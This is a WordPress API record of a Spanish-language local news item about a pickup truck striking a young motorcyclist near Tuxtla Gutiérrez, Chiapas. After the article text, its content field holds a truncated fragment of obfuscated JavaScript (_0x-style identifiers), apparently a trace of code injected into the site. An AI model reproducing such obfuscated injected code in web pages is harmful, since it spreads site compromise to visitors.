{"id":6346,"date":"2022-11-04T03:37:48","date_gmt":"2022-11-04T03:37:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6346"},"modified":"2022-11-04T03:37:49","modified_gmt":"2022-11-04T03:37:49","slug":"camioneta-embiste-a-motociclista-en-el-jobo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6346","title":{"rendered":"Camioneta embiste a motociclista en El Jobo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221103-WA0019-768x1024.jpg\" alt=\"\" class=\"wp-image-6347\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221103-WA0019-768x1023.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221103-WA0019-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221103-WA0019-1153x1536.jpg 1153w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221103-WA0019.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 3 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Un joven motociclista result\u00f3 con m\u00faltiples heridas luego de ser embestido por una camioneta cuando circulaba en el tramo Tuxtla Guti\u00e9rrez-Suchiapa.<\/p>\n\n\n\n<p>De acuerdo con los reportes de tr\u00e1nsito, Abenamar de 26 a\u00f1os manejaba una motocicleta Italika de color negro con rojo en el carril de Norte a Sur cuando fue chocado en la parte trasera y sali\u00f3 volando para impactarse contra el pavimento, a la altura de una gasolinera.<\/p>\n\n\n\n<p>El herido fue trasladado al hospital G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Los familiares del motociclista se llevaron la unidad y recomendaron que, interpusieran su denuncia correspondiente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 3 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Un joven motociclista result\u00f3 con m\u00faltiples heridas luego de ser embestido por una camioneta cuando circulaba en el tramo Tuxtla Guti\u00e9rrez-Suchiapa. De acuerdo con los reportes de tr\u00e1nsito, Abenamar de 26 a\u00f1os manejaba una motocicleta Italika de color negro con rojo en el carril &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6347,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-6346","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6346","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6346"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6346\/revisions"}],"predecessor-version":[{"id":6348,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6346\/revisions\/6348"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6347"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6346"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6346"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6346"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}